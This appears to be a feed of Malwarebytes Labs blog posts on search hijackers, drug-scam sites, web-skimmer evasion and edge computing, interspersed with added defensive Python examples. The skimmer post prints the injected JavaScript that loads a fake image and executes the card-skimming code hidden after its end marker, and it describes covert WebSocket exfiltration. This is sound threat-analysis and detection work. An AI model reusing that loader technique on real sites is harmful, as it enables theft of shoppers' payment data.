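        with open(genuine, "wb") as fh:
            fh.write(b"MZ" + b"\x00" * 1000)
        vendor_line = "%s  legacy_driver_setup.exe" % sha256_of_file(genuine)
        digest, _name = parse_checksum_line(vendor_line)

        tampered = os.path.join(tmp, "legacy_driver_setup_mirror.exe")
        with open(tampered, "wb") as fh:
            fh.write(b"MZ" + b"\x00" * 999 + b"\x01")   # one byte differs

        return verify_download(genuine, digest), verify_download(tampered, digest)

if __name__ == "__main__":
    print(demo())   # (True, False)
```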

Much ado about what?

All this may seem like a lot of work to those who habitually download files without a worry in the world. However, even the most practiced downloader eventually has their moment of truth—when that downloaded file wrecks their computer or all those bundled applications are harder to remove than expected.

People who download all the time have better instincts about which sites to trust or not, but that doesn’t mean they can’t be fooled. From experience, they know the sites that offer malware under a different filename from the sites that offer clean files. But sometimes, we reach for the shiny golden delicious and, once we take a bite, discover it has a worm.

We don’t all have the stomach or the knowledge to clean an infected computer. And some systems are not ours to put at risk.

Even if you follow all these pointers to the letter, it is still riskier to download files from unknown sites than it is to download from the company that made them. So we would like to urge companies to keep their “old files” available on their own site, even if the number of downloads has dwindled.

Stay safe, everyone!

The post Dubious downloads: How to check if a website and its files are malicious appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Billion-dollar search engine industry attracts vultures, shady advertisers, and cybercriminals

Malwarebytes - Mon, 01/06/2020 - 20:04

Search engines make money by showing users sponsored advertisements—a lot of money. This attracts attention, competition, and plenty who want a piece of the action without doing the actual work or considering the impact to those on the other end of the search bar. Because in the search business, even the crumbs are interesting.

In this post, we look at the ways in which shady advertisers, cybercriminals, and other vultures try to siphon off profits from the search engine business using sneaky tech tactics that ultimately harm users more than the search engines themselves.

How exactly do search engines make money?

Every time someone clicks on a sponsored advertisement, the requisite search engine earns money on a pay-per-click basis. They are paid by advertisers, who shell out for beneficial placement in the search results for keyword phrases of their choice.

As a result of the popularity of these search engines—Google in particular—US companies spend an estimated $80 billion on search engine optimization (SEO) alone. And the leading search engines are owned by some of the most valuable technology companies around.

Default search engine

Knowing this may make it easier to understand why browser hijackers are so keen on changing the default search engine on your favorite browser. They get a piece of the pie for referrals, and this entices them to use several methods to have your searches run through their hands. If a hijacker manages to change your default search engine to their own, they can profit from your searches.

But there are other profitable ways to interfere with your search results:

  • Newtabs are browser hijackers that open a new tab with a site or page set by the hijacker. These pages usually contain a search bar. The goal is to get the user to enter his queries in that search form instead of searching from the address bar, which would still point to the default search engine.
  • Startpage hijackers change the startpage of the affected browser for very much the same reasons as newtabs, just on different browsers.
  • Searchpage hijackers are mostly browser extensions that can read and change the data on a number of websites. In these cases, the websites are the major search engines. Search hijackers come in a few major flavors:
    • Redirects from major search engines are forced to a site owned by the hijacker. Sometimes the results will be displayed there, but sometimes you get sent back with only a referral added to your query. The referrals are what pays the hijackers.
    • Sponsored results are added to the results retrieved by major search engines and sometimes presented as if you are using a whole new search engine. At other times the changes are so minimal you may never notice.
    • Sponsored results are added to the results of major search engines and presented as if they were the original results.
    • Redirected searches occur from a major search engine to another search engine. The hijacker feeds your query to another engine and adds its referral on the fly.

Each of the above methods is in use by major families of potentially unwanted programs (PUPs) and adware. While neither of these threat categories is considered malware, they inhibit users’ ability to view clean, original search results using the engine of their choice, ultimately interfering with their online experience.

More invasive methods of profiting from search results

Seeing the potential for profit windfall, PUPs and adware have found other, more invasive ways of making money from your searches—methods that interfere with the displayed results. These include:

  • Search result changers that give paying sites a better position without disclosing that they are paid.
  • SEO poisoning that artificially acquires a better page rank.
  • Ad fraud, which dupes advertisers into believing they have displayed their advertisement on affected machines, while the user of such machine may not have noticed anything at all.

Page rank describes how high up in the search results your entry shows up. The higher the better is the general consensus, but you surely want to be on the first page. If people spot a search result likely to fulfill their quest for knowledge on the first page of results, they typically click on that link before even bothering to look at the other pages of results. Many are known to follow the first link beneath the sponsored results.

How do you achieve a good page rank? Search engines use many different algorithms to decide on the order in which to display results, but one of the main criteria is to have lots of incoming links to the webpage, with the understanding that links from reputable sites have heavier weight.

SEO poisoning is hard to do on the major search engines: They’ve seen every trick in the book and are vigilant about banning those tactics as fast as they can. So if you abuse the position of being marked as a reputable site, you might lose it a lot faster than you gained it. It will only render short-term effects, which works for those going for fast cash, but not for long-term business.

Fake privacy extensions

There are many ways to make changes to search engines and search results on a system affected with PUPs or adware, but the most popular method is to seduce victims into installing a browser extension that promises some kind of functionality.

It is typical to see search hijackers promising to guard your online privacy or act as an ad blocker, as both of those plugins require users to grant them permission to view or have control over a wide range of data and computer settings. Because of this, it is important users vet potential privacy extensions and ad blockers thoroughly before downloading.

Example hijackers

Let us show you some examples of the different search hijackers and the permissions they need to pull off their dirty work. I’ll use the permissions prompts for Chrome extensions only, but most of these hijackers also exist in the Firefox realm.

Example 1: Changing default search

Your default search settings will be changed, which is a red flag. This type of extension usually promises you some functionality that explains the need for such a permission.

Example 2: Changing results

Changing your data in this case means they will alter the search results from the three major search engines: Bing, Google, and Yahoo. The fourth listing is for the origin of this extension.

Example 3: Adding a search bar on the new tab:

The page that gets displayed when you open a new tab will hold a search form that leads to the search site belonging to the extension.

Example 4: The kitchen sink

This extension changes the newtab and the default search; a multi-vector attack so to speak. It also requires other permissions, such as reading browsing history and managing downloads, that I would shy away from for privacy reasons.

Example 5: Adding sponsored results to your Google results:

This one fetches the results from Google and then adds a tiny header and a bunch of sponsored results.

This will be shown next to the sponsored results.

Search engine thieves are hard to find

We see a lot of complaints from people wondering what caused their search experience to change and how. Most of the time, it is because of an extension like the examples shown above. Many people don’t realize the extensions are the culprit because they were installed for a different reason, sometimes even from a reputable source or as part of a bundle—sometimes pretending not to install at all. But reading between the lines of the fine print in those permission requests—or just plain reading them at all—can give you insight into how your search engine and browser experience became tangled up in PUPs and adware.
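As an added illustration that is not from the original post, this Python script reads a Chrome extension manifest (a constructed sample modelled on the kitchen-sink extension of Example 4) and reports the permission patterns discussed above: default-search and new-tab overrides, host access to Google, Bing, and Yahoo, and the history and downloads permissions.

```python
import json

# Added example, not from the Malwarebytes post: audit an extension manifest for
# the red flags the post describes. The sample manifest below is constructed.

SEARCH_ENGINE_HOSTS = ("google.", "bing.", "yahoo.")

def _hosts_in(patterns):
    """Extract the host part of Chrome match patterns such as '*://*.google.com/*'."""
    hosts = []
    for pattern in patterns:
        if pattern in ("<all_urls>", "*://*/*", "http://*/*", "https://*/*"):
            hosts.append("<all>")
            continue
        rest = pattern.split("://", 1)[-1]
        hosts.append(rest.split("/", 1)[0].lstrip("*."))
    return hosts

def audit_manifest(manifest):
    """Return human-readable findings; an empty list means none of the red flags apply."""
    findings = []
    overrides = manifest.get("chrome_settings_overrides", {})
    if "search_provider" in overrides:
        url = overrides["search_provider"].get("search_url", "?")
        findings.append("changes the default search engine to %s (example 1)" % url)
    if "homepage" in overrides or "startup_pages" in overrides:
        findings.append("changes the startpage (startpage hijacker)")
    if "newtab" in manifest.get("chrome_url_overrides", {}):
        findings.append("replaces the new-tab page (newtab hijacker, example 3)")

    # Manifest V2 lists host patterns under "permissions", V3 under "host_permissions";
    # content_scripts "matches" also grant the right to read and change those pages.
    patterns = [p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"]
    patterns += manifest.get("host_permissions", [])
    for script in manifest.get("content_scripts", []):
        patterns += script.get("matches", [])
    hit = sorted({h for h in _hosts_in(patterns)
                  if h == "<all>" or h.startswith(SEARCH_ENGINE_HOSTS)})
    if hit:
        findings.append("can read and change data on search engines: %s (example 2)"
                        % ", ".join(hit))

    for perm in ("history", "downloads", "tabs", "webRequest"):
        if perm in manifest.get("permissions", []):
            findings.append("requests the %r permission (example 4)" % perm)
    return findings

# Constructed manifest modelled on the "kitchen sink" extension of example 4.
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 2,
  "name": "Privacy Search Guard (constructed sample)",
  "version": "1.0",
  "permissions": ["history", "downloads", "*://*.google.com/*", "*://*.bing.com/*"],
  "chrome_settings_overrides": {
    "search_provider": {"search_url": "https://search.example.invalid/?q={searchTerms}",
                        "name": "Example Search", "keyword": "ex",
                        "encoding": "UTF-8", "is_default": true}
  },
  "chrome_url_overrides": {"newtab": "newtab.html"},
  "content_scripts": [{"matches": ["*://*.yahoo.com/*"], "js": ["inject.js"]}]
}
""")

# Constructed manifest of an extension that asks for nothing search-related.
BENIGN_MANIFEST = {"manifest_version": 3, "name": "Word counter (constructed sample)",
                   "version": "1.0", "permissions": ["activeTab"]}

if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print("-", finding)
```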

We hope that this post (and a scan from a reputable antivirus program like Malwarebytes or Browser Guard) will help solve those problems in the future.

Stay safe, everyone!


A week in security (December 30 – January 5)

Malwarebytes - Mon, 01/06/2020 - 17:20

Last week on Malwarebytes Labs, we took a dive into edge computing, looked at new web skimmer techniques, and rolled our eyes at silly people doing silly things.

Other cybersecurity news:

Stay safe, everyone!


How not to buy drugs on the Internet

Malwarebytes - Fri, 01/03/2020 - 18:52

Disclaimer: This post is satirical in nature and meant to educate on the proliferation of scams, misinformation, and traps set up to trick those engaging in illicit or illegal activities online. Malwarebytes does not condone buying drugs on the Internet.

Perhaps you’re sitting at work one day when suddenly the thought crosses your mind: You’re going to shift careers to become a drug lord so powerful, it will put Scarface to shame. Given that you’re not currently connected to a network of cocaine suppliers, distributors, and money launderers, you naturally turn to the Internet.

But users beware: Those get-rich-quick schemes almost never work out, and that includes cashing in your good citizen chips to sell drugs. And, surprise, surprise, not all websites promising kilos of cocaine with quick shipping are being 100 percent honest with you. Let’s set out and see what we find.

Searching for suppliers

As aspiring drug lords, our first search is “buy cocaine online,” which yields hxxp://

Naturally, to take advantage of the free shipping, we’ll want to buy in bulk:

There are a few red flags though, mainly in that the site owners purport to take PayPal. Like most scams, you can spot the con by looking at what sort of payment they accept. PayPal leaves a digital trail that is trackable, and PayPal as a company frequently turns data over to all levels of law enforcement. So perhaps not the greatest method of getting our hands on an illicit product.

But there’s a WhatsApp number listed, so we can search on 1 (502) 509 5319. That yields the following:

This is more promising, as Chinese pharma manufacturers have been known to sell online to western consumers, both via clearnet and dark net markets. Also, there’s a Wickr ID. While use of an encrypted messenger service certainly doesn’t eliminate the possibility of a scam, drugs are brokered with the service, sometimes in person. Searching further on the Wickr ID:

No cocaine, but a significant amount of heavy pharmaceuticals with a shipping location listed as Shanghai, China. Dropping our drug lord aspirations for a moment, Chinese fentanyl and carfentanil are commonly seen as a huge contributing factor to a surge in opioid overdoses and deaths in the US. While this particular listing may or may not be a scam, acquiring real, deadly opiates via clearnet and mail is generally way too easy.

The Cnchemex handle appears on a site (now down) using an Indian name server, as well as a classified ad site targeting the overseas Indian community, suggesting the actor might be misrepresenting their location. That said, real sellers doing real harm use similar methods to push product overseas.

Why is this so easy? Bargain hosting

hxxp:// is hosted by Namecheap, a well-known, low cost host. Bargain hosts have a tendency to make their profits on volume, creating a business incentive toward taking all comers as fast as possible, with as little friction as possible. Great for reducing barriers of entry for low-resource users. Less great for keeping scams and malware out, as well as tracking bad actors.

Most low-cost hosts do not keep blacklists for prior bad acts, and some don’t even consider certain scams malicious if they don’t damage the user’s machine. As a result, scammers who take lots of money for “drugs” and never deliver can trivially move from one site to another without incurring significant infrastructure costs, or any significant fear of being permanently banned.

Lessons learned

The site above and those like it are pretty obvious scams 99 percent of the time. It’s easy to mock scams when they take advantage of users looking for illegal activities. But scammers like to diversify their income streams and will often use similar tactics and infrastructure for more harmful activities.

Ultimately, these scams are merely symptomatic of poorly-designed monitoring systems and underfunded security teams that allow both petty scams and destructive malware to slip through the net. Less fraud and a better Internet depend on addressing the systems failures that generate these vectors, as well as users who exercise a bit of critical thinking when presented with something too good to be true. And that includes becoming a drug lord via Internet search.

Stay vigilant and stay safe.


New evasion techniques found in web skimmers

Malwarebytes - Mon, 12/30/2019 - 22:25

For a number of years, criminals have been able to steal credit card details from unaware online shoppers without attracting too much attention. Few people in the security industry were talking about these credit card web skimmers, both server-side and client-side, before the latter became largely known as Magecart.

It took some major incidents, notably the Ticketmaster and British Airways breaches, to put this growing threat under the spotlight and finally raise awareness among online merchants and consumers.

Under pressure from greater scrutiny, in particular from a number of security researchers, some threat actors started to evolve their craft. This is a natural reaction, not limited to web skimmers, but one that applies to any malicious enterprise, cyber or not.

One such recent evolution includes two new evasion techniques adapted for client-side web skimmers used to conceal their fraudulent activity.

Steganography: a picture worth a thousand secrets

Steganography has long been used by malware authors as a way to hide data within legitimate-looking images. Back in 2014, we described a new variant of the Zeus banking Trojan called ZeusVM, which was hiding its configuration data within a picture of a beautiful sunset.

In the context of website security, hiding malicious code in picture files is a great way to go undetected. Take, for example, an e-commerce website and the various components it loads—many of these will be logos, product images, and so forth.

On December 26, @AffableKraut disclosed the first publicly-documented steganography-based credit card skimmer. To the naked eye, the image looks like a typical free shipping ribbon that you commonly see on shopping sites.

Figure 1: A free shipping logo found on a shopping site

The only indication that there might be something amiss is the fact that the file is malformed, with additional data found after the normal end of the file.

To better understand what and where this data might be, we can look at the image in a hex editor. The JPEG File Interchange Format (JFIF) for the JPEG encoding has a specific structure. We used Ange Albertini’s diagram as a guide.

Figure 2: Looking at the image structure from the beginning of the file

So far, the image meets its requirements, and there does not appear to be anything special about it. However, if we remember what we saw in Figure 1, extra data was added after the final segment, which has the marker FF D9.

Figure 3: Looking at the structure of the image, after the normal end of file

Now we can see JavaScript code beginning immediately after the end of file marker. Looking at some of its strings such as onestepcheckout or authorizenet, we can deduce immediately that this is the credit-card skimming code.

All compromised sites we found using a steganographic skimmer were injected with similar code snippets (typically after the footer element or Google Tag Manager) to load the fake image and parse its JavaScript content via the slice() method.

var xhr = new XMLHttpRequest();
xhr.open('GET', '[image path]', true);  // request the fake image file
xhr.onreadystatechange = function() {
    if (this.readyState != 4) return;   // wait until the response is complete
    if (this.status == 200) {
        var F = new Function(this.responseText.slice(-[number]));  // the last [number] bytes, after the JPEG end-of-image marker, are the skimmer script
        F();
    }
};
xhr.send();

As it happens, the majority of web crawlers and scanners will concentrate on HTML and JavaScript files, and often ignore media files, which tend to be large and slow down processing. What better place to sneak in some code?
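The following Python example, added here and not part of the original post, applies the JFIF structure walk described above to detect the trick: it follows the segment markers to FF D9 and reports whatever bytes follow the end-of-image marker. The JPEG bytes it builds are a constructed minimal image, not the skimmer’s image.

```python
import struct

# Added example, not from the Malwarebytes post: walk the JFIF/JPEG segment
# structure and report any bytes sitting after the End-Of-Image marker (FF D9),
# which is where the steganographic skimmer was appended.

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
RST_MARKERS = frozenset(range(0xD0, 0xD8))     # RSTn markers carry no length field
STANDALONE = RST_MARKERS | {0x01, SOI, EOI}    # all markers without a length field

def jpeg_trailing_data(data):
    """Return (segments, trailing). `segments` lists the (marker, length) pairs
    walked up to EOI; `trailing` is everything after FF D9 (b"" for a clean file).
    Raises ValueError when the bytes are not a structurally sane JPEG."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    pos, segments = 2, [(SOI, 0)]
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                      # fill byte, skip it
            pos += 1
            continue
        if marker == EOI:
            segments.append((EOI, 0))
            return segments, data[pos + 2:]     # anything here is not part of the image
        if marker in STANDALONE:
            segments.append((marker, 0))
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        segments.append((marker, length))
        pos += 2 + length                       # skip marker plus length-prefixed payload
        if marker == SOS:
            # Entropy-coded scan data follows. Advance to the next real marker:
            # FF followed by a byte that is neither 00 (stuffed FF) nor an RSTn.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and nxt not in RST_MARKERS:
                    break
                pos += 1
    raise ValueError("no EOI marker found")

def looks_like_script(trailing):
    """Cheap heuristic on trailing bytes: printable ASCII containing JavaScript-ish tokens."""
    try:
        text = trailing.decode("ascii")
    except UnicodeDecodeError:
        return False
    return any(tok in text for tok in ("function", "XMLHttpRequest", "document.", "var ", "=>"))

def build_minimal_jpeg(extra=b""):
    """Constructed minimal JPEG: SOI, APP0/JFIF, a tiny fake SOS scan, EOI, then `extra`."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    parts = [b"\xff\xd8",
             b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0,
             b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00",
             b"\x12\x34\xff\x00\x56",           # fake entropy data, including a stuffed FF 00
             b"\xff\xd9"]
    return b"".join(parts) + extra

if __name__ == "__main__":
    clean = build_minimal_jpeg()
    tainted = build_minimal_jpeg(b"var x=new XMLHttpRequest();")   # constructed payload
    for name, img in (("clean", clean), ("tainted", tainted)):
        segs, trailing = jpeg_trailing_data(img)
        print(name, len(segs), "segments,", len(trailing), "trailing bytes,",
              "script-like" if looks_like_script(trailing) else "no script")
```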

Several years ago, there were major malvertising campaigns redirecting victims to the Angler exploit kit, one of the most advanced toolkits leveraged to infect users with malware. One threat actor used a similar technique by concealing fingerprinting code within a fake GIF image. At the time, this was the crème de la crème of malvertising techniques.

In a sense, any file loaded directly or from a third party should be deemed suspicious. @AffableKraut links to an open source file scanning system called Strelka that may be helpful for defenders in detecting anomalous files.

Figure 4: Malwarebytes blocking a skimmer using steganography

WebSockets instead of HTTP

WebSocket is a communication protocol that allows streams of data to be exchanged between a client and server over a single TCP connection. Therefore, WebSockets are different from the more commonly-known HTTP protocol, which consists of requests and responses to a server from a client.

Figure 5: Comparing WebSocket and HTTP protocols

While WebSockets are advantageous for real-time data transfer, this is not the reason threat actors may be interested in them. For their particular use case, WebSockets provide a more covert way to exchange data than typical HTTP requests-responses.

With web skimmers, there are certain artifacts we look for:

  • Skimmer code injected directly into a compromised site (JavaScript in the DOM)
  • Skimmer code loaded from an external resource (script tag with src attribute)
  • Exfiltration of the stolen data (HTTP GET or HTTP POST requests with encoded data)

However, WebSockets offer yet another way of exchanging data, as found by @AffableKraut. The first component is the skimming code itself, followed by the data exfiltration.

The attackers do need to load a new WebSocket, and that can be detected in the DOM. However, they obfuscated the code well enough that it blends in completely.

Figure 6: Malicious code that secretly loads the WebSocket

The goal is to conceal a connection to a server controlled by the criminals over a WebSocket. Once this JavaScript code runs in the browser, it will trigger the following client handshake request:

Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: {removed}
Upgrade: websocket
Origin: https://www.{removed}.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: {removed}
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits

It will be followed by the server handshake response:

HTTP/1.1 101 Switching Protocols
Server: nginx/1.12.2
Date: {removed}
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: {removed}
EndTime: {removed}
ReceivedBytes: 22296
SentBytes: 57928

Once this is established, a series of bidirectional messages will be exchanged between the client (victim’s browser) and server (malicious host). A larger Base64-encoded blob is downloaded onto the client and processed as JavaScript code. This turns out to be the credit card skimming code.
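The handshake check below is an added example, not code from the original post: it parses a client request and server response like the ones above (with the {removed} values replaced by constructed ones, and a Host header assumed), verifies that Sec-WebSocket-Accept is derived from Sec-WebSocket-Key as RFC 6455 requires, and flags an upgrade to a host outside the site’s own allowlist, which is the artifact a defender would hunt for.

```python
import base64
import hashlib

# Added example, not from the Malwarebytes post. Header values shown as {removed}
# in the post are replaced by constructed ones and a Host header is assumed.
# The Accept derivation follows RFC 6455 section 4.2.2.

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

# Constructed client handshake, modelled on the one captured in the post.
CLIENT_HANDSHAKE = """GET /socket HTTP/1.1
Host: cdn-metrics.example.invalid
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (constructed)
Upgrade: websocket
Origin: https://www.shop.example.invalid
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
"""

# Constructed server response; the Accept value is the correct one for the key above.
SERVER_HANDSHAKE = """HTTP/1.1 101 Switching Protocols
Server: nginx/1.12.2
Date: Thu, 26 Dec 2019 00:00:00 GMT
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
"""

def expected_accept(key):
    """Sec-WebSocket-Accept = base64(SHA-1(Sec-WebSocket-Key + GUID))."""
    digest = hashlib.sha1((key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")

def parse_headers(raw):
    """Split a raw handshake into its start line and a dict keyed by lower-cased header name."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def check_handshake(client_raw, server_raw, allowed_hosts):
    """Return a list of findings; an empty list means the upgrade is well-formed
    and goes to a host the site is expected to talk to."""
    _, req = parse_headers(client_raw)
    status_line, resp = parse_headers(server_raw)
    findings = []
    if (req.get("upgrade", "").lower() != "websocket"
            or "upgrade" not in req.get("connection", "").lower()):
        findings.append("client did not request a websocket upgrade")
    if not status_line.startswith("HTTP/1.1 101"):
        findings.append("server did not switch protocols: %s" % status_line)
    key = req.get("sec-websocket-key")
    if key is None or len(base64.b64decode(key)) != 16:
        findings.append("Sec-WebSocket-Key missing or not a 16-byte nonce")
    elif resp.get("sec-websocket-accept") != expected_accept(key):
        findings.append("Sec-WebSocket-Accept does not match the key (non-compliant endpoint)")
    host = req.get("host", "")
    if not any(host == h or host.endswith("." + h) for h in allowed_hosts):
        findings.append("websocket to unexpected host %s from page origin %s"
                        % (host, req.get("origin", "?")))
    return findings

if __name__ == "__main__":
    for finding in check_handshake(CLIENT_HANDSHAKE, SERVER_HANDSHAKE, ["shop.example.invalid"]):
        print("-", finding)
```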

Figure 7: The WebSocket messages, downloading the skimmer and then leaking CC data

The following smaller messages are exfiltration attempts of form fields present on the checkout page. The data has been encrypted to make it less obvious. We can see that there are duplicates, just like what we also encounter with some traditional skimmers that trigger the exfiltration based on a repeated timer event.

WebSockets were also used by another web threat, which at the time was making headlines almost daily: cryptojacking. In this case, it wasn’t so much for concealment but efficiency, as the in-browser mining process had to send back hashes to the server for each new mining job. However, we did notice the use of WebSockets in tandem with proxies in order to evade detection.

Figure 8: Malwarebytes blocking a skimmer using WebSockets

Different tricks, same protection

The techniques described in this blog will no doubt cause headaches for defenders and give some threat actors additional time to carry on their activities without being disturbed. But as mentioned before, this kind of cat-and-mouse game was to be expected in the light of regular new publications on Magecart and web skimmers.

There are other ways to hide and load malicious scripts. Although the technology is being retired, Flash Player via ActionScript was also a great vehicle for many malware campaigns. For instance, a famous redirection infrastructure called EITest used to have a SWF file that loaded a malicious iframe to an exploit kit.

While the majority of malware authors will keep using traditional methods, more advanced actors will come up with new ways to evade detection. Some techniques may be targeted at researchers, while others may be intended to bypass web crawlers.

At Malwarebytes, we continue to monitor the shift in this threat landscape to keep our users safe. Protection against web skimmers is available through our Malwarebytes software.

We would like to thank @AffableKraut for sharing details about these skimming techniques.


Explained: edge computing

Malwarebytes - Mon, 12/30/2019 - 18:41

Edge computing may seem like a foreign and future-facing term. Yet its applications are widespread and diverse, with the ability to transform the way we store, use, and share data and programs online. The implications of edge computing are far-reaching, trickling down from software development and business applications to everyday computing—even to gameplay.

Recently, I followed a discussion about whether online gaming’s performance and graphics could ever compare to that of consoles. Gaming consoles typically provide users with faster action, more detailed environments and precise movements, quicker reaction times, and higher resolution than online games.

While some stated that online games could never measure up, others noted that the gaming industry keeps moving its focus toward online play. Redbox, for example, has stopped offering physical video games for rent. So will gamers have to forever trade game performance and quality for ease-of-use? Or can they have both? If game developers want to make this dream a reality, it will certainly involve edge computing.

What is edge computing?

Edge computing is, by definition, a method by which data storage and computation happens closer to the location where it’s needed, reducing latency and improving bandwidth while using cloud-based applications. This can be a huge benefit for those streaming videos, opening large files, or playing online games. To accomplish this, we might see Content Delivery Networks (CDNs), or networks of proxy servers set up in different locations, combined with cloud functionality to deliver the requested data almost directly to the user.

As more and more applications move to the cloud, shared bandwidth becomes increasingly problematic. Edge computing, then, is being hailed as the next movement in software development and data storage. Let’s explain a few of the ground principles of edge computing to understand how this principle will apply across the technologies we know and use every day.

Latency in computing

Latency is the time interval between a stimulation and the response, or, to simplify even further, a time delay between the cause and the effect of some physical change in the system being observed. Latency can happen in the human nervous system, in mechanical engineering, and, of course, in computing. Whenever witnessing a streaming service buffer, a pinwheel rotate around and around, a web page slow to load—that’s latency in a nutshell.

In that context, network latency describes the delay that takes place during communication over a network (including the Internet). Latency mostly depends on the type of connection and the proximity of the nearest server.

For a regular Internet connection, a latency of 100 ms (milliseconds) is considered acceptable today—though users are arguably becoming less and less patient. For a good gaming experience, you would want latency of 30 ms or less. In virtual reality applications, any latency above 7 ms produces motion sickness.

Content delivery networks

Content delivery networks (CDNs) are systems of distributed servers (networks) that deliver web content to a user based on their geographic location, the origin of the webpage, and the content delivery server itself.

In layman’s terms, this means that the information is copied to servers around the globe and a user gets the information from the server closest to him that has the requested information available. This also allows for geo-specific content to be distributed for optimal usage. After all, having a Dutch EULA on a server in Japan doesn’t make a lot of sense.

CDNs, as mentioned above, will provide a critical pathway from data stored in the cloud to the user, essentially bouncing the information from a single massive server to the servers closest to the exchange of data (the web content and the user).

The cloud

This is where the equation for edge computing comes together—at the edge of the cloud. CDNs alone cannot deliver all the necessary data while solving for latency and allowing easier access. Cloud computing, then, or the delivery of on-demand computing resources, such as applications and data centers, over the Internet, completes the formula.

Cloud resources are often split up in three ways:

  • Public: Cloud services are delivered over the Internet and sold on demand, which provides customers with a great amount of flexibility. You only pay for what you need.
  • Private: Cloud services are delivered over the business network from the owner’s data center. You have control over the hardware, as well as the management and related costs.
  • Hybrid: A mix of the above. Businesses can choose to have control over the most sensitive data, and use public services to cover the rest of their needs.

Edge computing would likely employ the hybrid solution with a distributed cloud platform, which means that the cloud resources are placed strategically to provide the locations that have the highest demands with the highest level of resources.

Netflix: a special case

Considering edge computing’s applications, you might be inclined to envision streaming video services as beneficiaries. That might be so one day, but right now, the biggest name in the game, Netflix, has achieved fast-loading viewing times to millions at once without going to the edge.

Netflix has grown to serve over 50 million subscribers in 40 countries. To optimize the user experience, Netflix has taken online video streaming to the next level by building their own CDN, partnering with ISPs in the serviced countries, and developing a system that adapts the quality (resolution) of the content to the latency of the users’ connection. They are not employing edge computing techniques because they built their own infrastructure.

What this means in practice is that Netflix works directly with the ISPs by installing boxes called Open Connect Appliances either at exchange points or within the ISPs. These boxes can hold up to 280 Terabytes of video, which contains everything Netflix has to offer in your neck of the woods.

This means that in most cases, you are connecting to Netflix through your own ISP, provided it is one of Netflix’s partners, which results in maximum speed and low latency. As an extra method of avoiding noticeable buffering, Netflix can lower the image quality, which results in fewer pixels being sent.

Edge computing

The goal of edge computing is to achieve the resolution, speed, and ease of access that Netflix offers us, but without having to make the huge investments in infrastructure. The trick is to create a mix of hardware solutions and distributed cloud resources that can be deployed so that every endpoint user has the impression they are working locally.

When looking for an edge computing solution, it is imperative to know whether demand will remain more or less distributed in the same way or whether we need more flexibility when it comes to peak usage taking place in different locations.

To keep the mix of resources in sync with any shifts in demand by size and location, we will need some software solution to keep track of the demand and adjust the settings to meet the set parameters—preferably one that informs us beforehand when the limits of what it can achieve are getting close to the borders of what we have indicated to be acceptable.

This way, we can make informed decisions about whether we need to expand in hardware, shell out more for cloud services, or start looking for a better management software.

Security in edge computing

As per usual in quickly-evolving fields, edge computing runs the risk of deploying security measures as an afterthought. It’s nice when our employees in remote offices can participate as if they were next-door, but not at the cost of leaking business information along the lines of communication or at the edges of our corporate network.

Assuming you have security within your own network perimeters in order, the next logical step would be to lock down the pathway of information to and from the cloud, as well as the data stored in the cloud—all has to be done without a noticeable impact on the latency.

Because faster communication was the goal we set out to achieve, it is tempting to forget that we still need to check what goes out and what comes back in. But neglecting these checks might turn the devices at the edge into open doors into your infrastructure. On the plus side, in edge computing the devices at the perimeter only get what they need by design, and that limits the chance of any threat actor retrieving a complete set of data from one device.

The future of edge computing

With 5G on the horizon and artificial intelligence ready to orchestrate resources, we see a bright future for edge computing. The latency times might even be adequate enough to conquer the gaming industry. Looking at the pile of plastic in my closet, it occurs to me that this will be better for the planet as well.

The post Explained: edge computing appeared first on Malwarebytes Labs.


A week in security (December 23 – 29)

Malwarebytes - Mon, 12/30/2019 - 16:55

Last week on Malwarebytes Labs, we continued our retrospective coverage with a look at how lawmakers in the United States treated online privacy this year, finding trends in multiple federal bills introduced in the Senate. Then we took a little break for the holidays.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (December 23 – 29) appeared first on Malwarebytes Labs.


Online privacy in 2019: a legislative review

Malwarebytes - Mon, 12/23/2019 - 17:41

For decades, the United States treated data privacy like an aging home, patching individual leaks and drafts only when a new storm hit. The country passed a law protecting healthcare-related information, and not much else. It then passed a law protecting video rental information, and not much else. It continued this way, repeatedly passing sector-specific laws while failing to address a problem that, in the past two years, became impossible to ignore.

Data privacy, as protected by law, is broken.

Americans enjoy no federal rights to access their data, correct their data, easily move their data from one company to another, or individually sue a company that invades their private lives online.

Harmed by the Equifax breach? Good luck getting more than literal pennies in the settlement. Shocked that a company shared menstrual tracking info with Facebook? Oh, well. Want to fight back against invasive online trackers? Your options are limited.

Since mid-2018, several US Senators have sought to fix these types of failures, introducing at least nine bills—with six introduced in 2019 alone—to provide comprehensive data privacy protections to every American.

